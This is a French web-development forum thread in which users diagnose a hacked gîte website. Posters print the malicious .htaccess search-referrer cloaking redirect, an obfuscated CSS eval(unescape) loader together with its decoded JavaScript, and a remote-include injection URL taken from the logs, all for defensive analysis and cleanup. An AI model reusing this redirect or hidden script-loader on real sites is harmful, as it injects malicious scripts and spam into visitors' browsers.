Bonjour,
Effectivement,la correction a l'air de marcher (le www.google.fr marche pas ),par contre,vaut mieux éviter les includes pour la prochaine fois (le log de 18h42 est de moi aussi )
(comme se méfier des uploads de fichiers et tout ça )
PS: l'enregistement des IP n'est pas une bonne solution je pense,car la plupart des hackers se cachent derrière des proxies,voire même piratent des ordinateurs d'innocents dans un but "maléfique"
Toute question technique envoyée en MP ira directement à la poubelle
Un code ne marchera jamais, il n'a jamais reçu la capacité de se déplacer.
Inutile donc de dire "ça marche pas", donnez plutôt des informations précises afin de mieux pouvoir vous aider.
Grand gourou de la -attitude
Vraiment les seuls upload facile a contrôler restent ceux qui ont un type-mine contôlable.
A ce sujet perso, je me suis limiét aux images que je change de taille par PHP
détruisant de ce fait tout code inclus.
Il faut accepter que l'IP de la majoritée des visiteurs change sans arret !
par contre entre la saisie d'un login et son contrôle, c'est une superbe arme !
pratiquemnt imparable !
Bon ben voila, le problème parait définitivement résolu, immense merci tt le monde!!!!
Y'a pas mal d'injections sur le fichier logs.txt, mais difficile de différencier les erreurs de réelles tentatives...
Y'en a quand même pas mal les même avec un numéro en guise d'adresse, je sais pas si ça peut être ça...
Moi je suis a fond dans les séjours maintenant, je repasserai sur ce forul pour... faire profite de mon expérience?
Et meeeeeeeeerde!
ca a recommencé! ca a tenu longtemps cette fois...
Je le laisse un peu comme ça, si y'en a qui veulent passer voir...
y'a des injections sur le fichiers logs.txt, dont une adresse longue et bizare, je sais pas si ça permet de savoir quelque chose...
De toutes façons pour nous la saison bat son plein, mais bon...
Font chier ces hackers à deux balles qui profitent de l'inexpérience des gens.
On voit bien l'ip cible dans le log et le nombre d'essais qu'ils ont faits, mais je ne vois pas la conséquence, tu as dû corriger entretemps.
Aurais-tu gardé le fichier ou l'url posant problème ?
Un bon signe néanmoins : ils ne doivent pas avoir les mots de passe ftp, parce que vu le nombre d'attaques sur /etc/passwd , ils l'ont bien cherché sans réussir.
A suivre...
- Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
- Merci d'utiliser les balises de code (# dans l'éditeur)
- N'oubliez pas de vous servir des boutons , et
S.N.A.F.U
Bonjour,
Ce que je peux te conseiller de faire,c'est de loguer TOUT ce qui entre,même les "includes" légitimes,ce qui te permet ensuite d'analyser ce qu'il se passe...
(parce que l'attaque réussie se fera pas logguer sinon ^^)
PS: dans tes logs,il y a des lignes commeet il semblerait que cette "faille" soit connue.
Code : Sélectionner tout - Visualiser dans une fenêtre à part hacker = xx.xx.xx.xx injection = http://217.218.225.2:2082/index.html?
Autre conseil : Ne mets pas tes logs dans le réertoire du serveur,car tout le monde y a accès
Toute question technique envoyée en MP ira directement à la poubelle
Un code ne marchera jamais, il n'a jamais reçu la capacité de se déplacer.
Inutile donc de dire "ça marche pas", donnez plutôt des informations précises afin de mieux pouvoir vous aider.
Grand gourou de la -attitude
C'est trés inquiétant,
il faudrait que nous ayons la totalitée des éléments clé de ton site
l'index
tout ces javascripts
les feuilles de style
le htaccess
(ceux qui sont sur ton site)
En effet on voit bien que le ménage n'est pas fait, et mon diagnostique est que lorsque la page qui possede le lien qui pointe chez toi, est google
alors il y a virus et attaque du micro qui visite
Seuls les fichiers que je t'ais mentionnés sonr intéressants mais il faut CEUX PRESENT sur ton site web.
Alors si tu es OK récupéres les sur ton micro ZIP (avec winzip pas de rAR)
et mets ça sur ton site, mets moi le lien par MP avec en copie s.n.a.f.u
et s' il le souhaite sabotage donc les trois modérateurs qui ont participés a cette discution. bien sur la confidentiakitée sera préservée !
Là j'avoue que je sèche !
J'ai un accès ssh au site du gite, et tout me parait correct.
Le .htaccess est nickel, le fichier index.html ne comprend pas de javascript et il n'y a pas d'autre index.
De plus, le diagnostic même m'épate : lorsqu'on tape l'adresse dans la barre, on tombe sur le site et il est bon, mais effectivement par google on atterrit sur autre chose. Plus étonnant : si tu fais back à partir de ce site pirate, tu retombes sur le bon site.
De plus, la version dans le cache de google est la bonne.
Donc :
En attendant, je me suis permis d'enregistrer le site sur les outils de webmaster de google et je vais voir s'il est possible de les joindre pour avoir une explication.
Ceci dit, je suis en pleine lan ce soir, donc je dirais à suivre, je dois retourner sur counter strike...
- Avant de poser une question, n'hésitez pas à chercher dans la FAQ et les forums
- Merci d'utiliser les balises de code (# dans l'éditeur)
- N'oubliez pas de vous servir des boutons , et
S.N.A.F.U
Alors la je suis largué !! je croyais que c'était le site de gitedoublel
bref si je ne peut avoir ces fichiers je ne peux aider personne !
c' est le serveur qui lorsque l'origine du visiteur est google, a un trou énorme !
d'autre part il me faut dans ma liste tout les fichiers include aussi !
question a la con:
L'url du site indexée dans google est-elle la bonne ?
Car j'ai eu le tour, en fait il n'y avais pas d'injection, mais l'inverse, ils injectaient mon contenue dans leur page et avec un bonne seo, on pouvait se faire avoir.
@mon_nom_est_personne : L'url est la bonne,car si tu F5,tu retombes sur le bon site.
J'ai essayé sur un autre moteur de recherche (altaVista),et là on tombe directement sur le bon site...
Il semblerait donc que ce soit google qui buggue (car en regardant bien,notre cher google effectue un lien vers une de ses pages qui nous redirige vers le site...)
Il est donc très probable que la hacker exploite une faille de google et non du site...
Regarde par ailleurs si t'as pas une ligne du genre:
Code : Sélectionner tout - Visualiser dans une fenêtre à part strpos($_SERVER["HTTP_USER_AGENT"],"Googlebot");
Toute question technique envoyée en MP ira directement à la poubelle
Un code ne marchera jamais, il n'a jamais reçu la capacité de se déplacer.
Inutile donc de dire "ça marche pas", donnez plutôt des informations précises afin de mieux pouvoir vous aider.
Grand gourou de la -attitude
Excelente analyse, je suis 100% OK avec toi !
Ouah!
Je ne sais que dire, en fait je répond juste pour vous signifier que je vous lis!
Par contre, en réponse surtout a snafu, je ne sais pas si le .htaccess est correct, mais ce n'est pas moi qui l'ai mis! Il réapparait a chaque fois que le site se fait pirater!
il y a par ailleurs un dossier plein de fichiers ajouté lui aussi...
Et pour supersnail, en effet, ça a l'air d'être la même attaque dont parlenr ces gens, avec le même numéro que celui enregistré dans le fichier logs de snafu...
C'est à la mode!
Edit: par ailleurs, j'ai trouvé dans le ftp un fichier vide nommé: google3b11ec2593a482c8.html
C'est louche ça! Ca ferait pas avancer le chmilblik?
1) le fichier vide est en fait la clé du contrat google pour le moteur de recherche que tu as je penses ?
2) tu a un htaccess ou une partie du texte est cachée donc a premiére vue on ne le vois pas !
3) tu a un enorme virus qui genere un trojan dans rbc_nav_styles.css
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13 SetEnv REGISTER_GLOBALS 0 SetEnv ZEND_OPTIMIZER 1 SetEnv MAGIC_QUOTES 0 SetEnv PHP_VER 5 # a0b4df006e02184c60dbf503e71c87ad RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC] RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\= RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22) RewriteCond %{TIME_SEC} <59 RewriteRule ^.*$ /bouncy/qasoje/ex3/t.htm [L] # a995d2cc661fa72452472e9554b5520c
si tu as un excelent antivirus, telecharges ce fichier par ftp et tu verras !
je vais réparer certaines choses par contre de quel répertoire parles-tu ?
Bonjour,
@FoxLeRenard: il sort d'où le .htaccess?
Toute question technique envoyée en MP ira directement à la poubelle
Un code ne marchera jamais, il n'a jamais reçu la capacité de se déplacer.
Inutile donc de dire "ça marche pas", donnez plutôt des informations précises afin de mieux pouvoir vous aider.
Grand gourou de la -attitude
Désolé l'ami, mais ne pouvant avancer depuis que nous patageons ça avec toi et d'autres, gitedoublel a donné a deux modérateurs un mot de passe provisoir de FTP.
Avec ce que nous avons observé s.n.a.f.u et moi, nous essayons de vous faire partager nos découvertes.
j'espéres que tu comprends que nous ne pouvions guére faire autrement
Effectivement,pour se "débarrasser" temporairement du hack,il faut supprimer le dossier "bouncy/qasoje" plus cette partie du .htaccess:
Ou sinon plus radical,mettre "AllowOverride None" à la place de "AllowOverride All" dans ton fichier de conf d'apache pour empêcher l'exécution des .htaccess
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9 # a0b4df006e02184c60dbf503e71c87ad RewriteEngine On RewriteCond %{HTTP_REFERER} ^http://([a-z0-9_\-]+\.)*(google|msn|yahoo|live|ask|dogpile|mywebsearch|yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\. [NC] RewriteCond %{HTTP_REFERER} [?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\= RewriteCond %{HTTP_REFERER} ![?&](q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)\=[^&]+(%3A|%22) RewriteCond %{TIME_SEC} <59 RewriteRule ^.*$ /bouncy/qasoje/ex3/t.htm [L] # a995d2cc661fa72452472e9554b5520c
Edit 1: Dans le fichier rbc_nav_styles.css on trouve cette ligne bizarre:
Et par curiosité,j'ai fait un unescape de la chaîne,et on trouve que ce code se trouve exécuté:
Code : Sélectionner tout - Visualiser dans une fenêtre à part body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%33%32%34%35%39%39%37%3B%20%4A%53%53%33%20%3D%20%27%2F%62%6F%75%6E%63%79%2F%71%61%73%6F%6A%65%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%62%6F%75%6E%63%79%2F%71%61%73%6F%6A%65%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */
Code javascript : Sélectionner tout - Visualiser dans une fenêtre à part
1
2 if (!document.getElementById('JSSS')){ JSS1 = 59; JSS2 = 3245997; JSS3 = '/bouncy/qasoje/dummy.htm'; var js = document.createElement('script'); js.setAttribute('src', '/bouncy/qasoje/check.js'); js.setAttribute('id', 'JSSS'); document.getElementsByTagName('head').item(0).appendChild(js) };
Edit 2: les conseils qu'on t'as donné auparavant,les as-tu aussi appliqués sur le dossier bouncy? (les protections anti-include)
Parce que je parie que c'est par là que les pirates sont entrés
PS: on peut accéder au hack par cette URL: http://www.gitedoublel.com/bouncy/qasoje/ex3/t.htm
Toute question technique envoyée en MP ira directement à la poubelle
Un code ne marchera jamais, il n'a jamais reçu la capacité de se déplacer.
Inutile donc de dire "ça marche pas", donnez plutôt des informations précises afin de mieux pouvoir vous aider.
Grand gourou de la -attitude
Vous avez un bloqueur de publicités installé.
Le Club Developpez.com n'affiche que des publicités IT, discrètes et non intrusives.
Afin que nous puissions continuer à vous fournir gratuitement du contenu de qualité, merci de nous soutenir en désactivant votre bloqueur de publicités sur Developpez.com.
Partager